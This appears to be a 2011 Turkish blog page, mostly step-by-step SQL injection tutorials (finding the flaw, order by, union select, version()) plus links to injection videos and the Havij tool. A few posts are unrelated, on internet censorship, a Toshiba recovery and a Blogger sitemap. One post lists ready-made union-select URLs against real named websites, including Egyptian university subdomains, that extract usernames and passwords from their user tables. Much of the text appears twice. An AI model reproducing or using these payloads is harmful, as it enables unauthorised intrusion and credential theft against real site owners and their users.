9 Mayıs 2011 Pazartesi
İnternetime, Bilgisayarıma, Bloguma Dokunma (!)
Gönderen Admin zaman: 16:09 Etiketler: Benim Kalemimden, Blog Genel, Bloguma Dokunma 0 yorum
Demokrasi hep uzaktaki ciger oldu sevgili ülkemde. Her ortam müsait olduğunda dem vurulurken bir olguya bir o kadar da uzak olmak karamizah örneği sanki. Fikrimizi söylerken karşı tarafın konuşmasını hiçbir zaman istemedik. "Özgürlük" diye bağırdık meydanlarda legal-jop'lar eşliğinde ancak hiç dinlemedik karşıdakinin ne dediğini. E balık baştan kokardı bu yüzden baş-bakanımız(!) sanala da sansür uygulamaya başladı. İçeriğe göre kapatmalar olmuştu ancak şimdilerde domain adlarına göre kapatılacakmış siteler. 90 bin civarında sitenin kapatılacağı tahmin ediliyormuş. "BLOG'UMA DOKUNMA" yetmeyecek anlaşılan "İNTERNET'İME DOKUNMA" ya da belki ilerde "BİLGİSAYARIMA DOKUNMA" sloganları duyacağız , söyleyeceğiz.. Şaşırmayın.
Toshiba Laptoplara Recovery İle Format Atma
Gönderen Admin zaman: 03:55 Etiketler: toshiba recovery, toshiba recovery format, toshina format 101 yorum
Arkadaşım sormuştu geçenlerde blogada da yazmanın faydalı olacağını düşündüm. Toshiba Recovery ile format atmak oldukça basittir aslında;
-Pc'yi açarken f8 tuşuna basıyoruz.(işe yaramazsa "fn" tuşu ile birlikte basın)
-Karşımıza gelen seçeneklerden "Bilgisayarınızı Onarın" seçeneğine tıklıyoruz.
-Çıkan seçeneklerden en alttaki "Toshiba Recovery" tıklıyoruz. Format başlıyor. Recovery'de C silinir ancak D'deki veriler kalır. Kolay gelsin.
-Pc'yi açarken f8 tuşuna basıyoruz.(işe yaramazsa "fn" tuşu ile birlikte basın)
-Karşımıza gelen seçeneklerden "Bilgisayarınızı Onarın" seçeneğine tıklıyoruz.
-Çıkan seçeneklerden en alttaki "Toshiba Recovery" tıklıyoruz. Format başlıyor. Recovery'de C silinir ancak D'deki veriler kalır. Kolay gelsin.
8 Mayıs 2011 Pazar
Sql İnjection Order By,Union Select,Version() Komutları Kullanımı Videolu Anlatım
Gönderen Admin zaman: 14:18 Etiketler: sql hack video, Sql İnjection, sql injection version bulma, sql injection video 0 yorum
Merhaba arkadaşlar. Daha önce blogda order by, union select ve version () komutlarını anlatmıştım. Bu yazılara görsellik kazandırmanın iyi olacağını düşündüm. Bu videoda yazılardan sonra aklınızda oluşan soru işaretleri kalmayacak.
BURDAN indirebilirsiniz.
BURDAN indirebilirsiniz.
7 Mayıs 2011 Cumartesi
Sql İnjection "Union Select" ve "Version()" Komutları
Gönderen Admin zaman: 13:06 Etiketler: Sql İnjection, sql injection data okuma, sql injection veri okuma, sql injection version bulma, union select, union select komutu 0 yorum
Bir önceki yazıda "order by" komutunu göstermiş ve sitedeki table sayısının nasıl bulunacağını anlatmıştım. Bu yazıda "union select" komutuyla siteden bilgi okumaya ve version bulmaya çalışacağız. Diyelim ki order by komutuyla table sayısının 6 olduğunu bulduk o zaman örneğimize devam edelim:
orneksite.com/ders.php?id=5+union+select+1,2,3,4,5,6-- bu adrese girdiğimizde herhangi bir değişiklik olmadıysa panik yapmayın ve hemen id değerinin önüne "-" işareti koyalım. Yani;
orneksite.com/ders.php?id=-5+union+select+1,2,3,4,5,6-- şimdi siteye sayılır yansıdı.
Bundan sonra ne yapacağımız sitede kullanılan veritabanı versiyonuna göre değişir. O yüzden versiyonunu öğrenelim. Diyelim ki sayılardan 3 ekrana yansıdı. 3 sayısını kullanalım.Şöyle ki;
orneksite.com/ders.php?id=-5+union+select+1,2,version(),4,5,6--
Versiyonu öğrendik. Gelecek yazıda buluşmak üzere..
orneksite.com/ders.php?id=5+union+select+1,2,3,4,5,6-- bu adrese girdiğimizde herhangi bir değişiklik olmadıysa panik yapmayın ve hemen id değerinin önüne "-" işareti koyalım. Yani;
orneksite.com/ders.php?id=-5+union+select+1,2,3,4,5,6-- şimdi siteye sayılır yansıdı.
Bundan sonra ne yapacağımız sitede kullanılan veritabanı versiyonuna göre değişir. O yüzden versiyonunu öğrenelim. Diyelim ki sayılardan 3 ekrana yansıdı. 3 sayısını kullanalım.Şöyle ki;
orneksite.com/ders.php?id=-5+union+select+1,2,version(),4,5,6--
Versiyonu öğrendik. Gelecek yazıda buluşmak üzere..
5 Mayıs 2011 Perşembe
Sql İnjection "Order By" Komutu
Gönderen Admin zaman: 17:46 Etiketler: Order by, Sql İnjection, sql injectionda order by komutu 1 yorum
Sql açığını bulduktan sonra yapılacak ilk iş sitenin "table" sayısını bulmaktır. Order by komutu table bulmak için kullanılır. Hemen örnekle gösterelim:
orneksite.com/ders.php?id=5 açığı bulduğumuz link. Hemen order by komutunu kullanalım.
orneksite.com/ders.php?id=5+order+by+1-- bu kodu yazdıktan sonra sitede hata yoktur. Çünkü her sitede en az bir table vardır. "--" bu çift tire ise adres çubuğuna yazdığımız kodun sql tarafından gönderildiğini belirtir. Hata alana kadar sayımızı büyütelim.
orneksite.com/ders.php?id=5+order+by+2-- hata yok..
orneksite.com/ders.php?id=5+order+by+3-- hata yok..
orneksite.com/ders.php?id=5+order+by+4-- hata yok..
orneksite.com/ders.php?id=5+order+by+5-- diyelim ki 5'de hata aldık. Demek ki table 4 tane. Yani hata aldığımız sayının 1 eksiği. Sql injectionda "Order by" komutunun işlevi budur.
orneksite.com/ders.php?id=5 açığı bulduğumuz link. Hemen order by komutunu kullanalım.
orneksite.com/ders.php?id=5+order+by+1-- bu kodu yazdıktan sonra sitede hata yoktur. Çünkü her sitede en az bir table vardır. "--" bu çift tire ise adres çubuğuna yazdığımız kodun sql tarafından gönderildiğini belirtir. Hata alana kadar sayımızı büyütelim.
orneksite.com/ders.php?id=5+order+by+2-- hata yok..
orneksite.com/ders.php?id=5+order+by+3-- hata yok..
orneksite.com/ders.php?id=5+order+by+4-- hata yok..
orneksite.com/ders.php?id=5+order+by+5-- diyelim ki 5'de hata aldık. Demek ki table 4 tane. Yani hata aldığımız sayının 1 eksiği. Sql injectionda "Order by" komutunun işlevi budur.
Blogger ve Blogspot Sitemap Yapımı
Gönderen Admin zaman: 17:18 Etiketler: blogger sitemap, blogspot sitemap, sitemap ekleme 0 yorum
Sitemap Google Amca'nın dostluğu için önemlidir. Sitemap yani "site haritası" indexlenmede Google Bot'una kolaylık sağlar. Yani daha kolay ve düzenli indexlenirsiniz. Sitemap yapmak için;
-www.google.com/webmaster/tools adresinize sitenizi kayıt edin,
-"Site Haritası" butonuna tıklayın,
-rss.xml yazın. Yani örnek : sqluzmani.blogspot./rss.xml
Artık Google daha yakın...
-www.google.com/webmaster/tools adresinize sitenizi kayıt edin,
-"Site Haritası" butonuna tıklayın,
-rss.xml yazın. Yani örnek : sqluzmani.blogspot./rss.xml
Artık Google daha yakın...
Sql Açığı Olan Siteler
Gönderen Admin zaman: 14:25 Etiketler: sql açığı olan siteler, Sql İnjection 0 yorum
http://www.bcspeakers.com/product.php?id=-162 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15 from _user--
http://www.lcoastpress.com/book.php?id=-32 union select 1,password,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from user--
http://www.foea.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd)paswrd,5,6,7,8,9,10%20from%20members--
http://cqap.agri.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd),5,6,7,8,9,10%20from%20members--
http://www.lcoastpress.com/book.php?id=-32 union select 1,password,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from user--
http://www.foea.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd)paswrd,5,6,7,8,9,10%20from%20members--
http://cqap.agri.scuegypt.edu.eg/view_pages.php?id=-10%20union%20select%201,2,3,group_concat(name,0x3a,paswrd),5,6,7,8,9,10%20from%20members--
22 Nisan 2011 Cuma
Hedef Sitede Sql İnjection Açığı Nasıl Bulunur?
Gönderen Admin zaman: 04:26 Etiketler: Sql İnjection 0 yorum
En çok sorulan sorulardan biri ;
-Hedef sitede sql injection açığı nasıl bulunur?
Bilindiği üzere sql veritabanındaki kayıtlara ''id'' değeri verir. Biz de bu ''id'' değerini kullanarak siteyi hataya zorlarız. Peki bu nasıl olur? Örneklendirelim ;
Sitemiz sqluzmani.com olsun. Öncelikle sitede ''id'' değeri bulalım. Bunun için sitede biraz gezmek yeterli ancak olur da bulamazsanız google Hoca'ya site:sqluzmani.com yazıp aratırsak bu sitenin google'ın indexlediği bütün sayfalarını görürüz. Arattık ve bulduk diyelim:
sqluzmani.com/ders.php?id=1
Bundan sonra açığı yakalamak için birden fazla yol var ancak ben en çok ('a) ile yapıyorum. Hemen devam edelim ve sitenin sonuna ekleyelim:
sqluzmani.com/ders.php?id=1'a
Bunu yazdığımızda sitede 3 değişik hata olabilir.
-Sitede bir değişiklik olur,
-You have an error in your SQL syntax near......,
-Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in......
Bu hatalardan en az birini aldığınız zaman sql injection var demektir. Ancak her açık olan site hacklenebilir demek yanlış olur. Forbidden ve 404 hatası verebilir daha sonra bunları bypass etmeyi de anlatıcağım. Bu yazının videosunu en yakın zamanda çekeceğim.
-Hedef sitede sql injection açığı nasıl bulunur?
Bilindiği üzere sql veritabanındaki kayıtlara ''id'' değeri verir. Biz de bu ''id'' değerini kullanarak siteyi hataya zorlarız. Peki bu nasıl olur? Örneklendirelim ;
Sitemiz sqluzmani.com olsun. Öncelikle sitede ''id'' değeri bulalım. Bunun için sitede biraz gezmek yeterli ancak olur da bulamazsanız google Hoca'ya site:sqluzmani.com yazıp aratırsak bu sitenin google'ın indexlediği bütün sayfalarını görürüz. Arattık ve bulduk diyelim:
sqluzmani.com/ders.php?id=1
Bundan sonra açığı yakalamak için birden fazla yol var ancak ben en çok ('a) ile yapıyorum. Hemen devam edelim ve sitenin sonuna ekleyelim:
sqluzmani.com/ders.php?id=1'a
Bunu yazdığımızda sitede 3 değişik hata olabilir.
-Sitede bir değişiklik olur,
-You have an error in your SQL syntax near......,
-Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in......
Bu hatalardan en az birini aldığınız zaman sql injection var demektir. Ancak her açık olan site hacklenebilir demek yanlış olur. Forbidden ve 404 hatası verebilir daha sonra bunları bypass etmeyi de anlatıcağım. Bu yazının videosunu en yakın zamanda çekeceğim.
19 Nisan 2011 Salı
Sql İnjection Havij Kullanımı Video 2
Gönderen Admin zaman: 13:20 Etiketler: Sql İnjection, Sql İnjection Havij, Sql İnjection havij kullanımı 2 yorum
Havij programının kullanımını anlattığım 2. video. Umarım Yardımcı olur.
Video Link ; http://mikiurl.com/uWziC
Video Link ; http://mikiurl.com/uWziC
Sql İnjection Havij İndir (Resmi Site)
Gönderen Admin zaman: 12:08 Etiketler: Sql İnjection 10 yorum
Uzun aradan sonra tekrar merhaba arkadaşlar. Blog'la pek ilginemedim kusura bakmayın. Havij kullanımını gösterdiğim videonun ve havij'in linkleri malumunuz kırılmış. Laptop'ın ekran kartı yandı videoyu tekrar upload edemeyebilrim ama en yakın zamanda yeni videolar çekeceğim. Şimdilik havij'i indirebileceğiniz bir link vereceğim. Havij proğramının resmi sitesidir:
Havij indir : www.itsecteam.com/en/projects/project1_page2.htm
Havij indir : www.itsecteam.com/en/projects/project1_page2.htm
Kaydol:
Kayıtlar (Atom)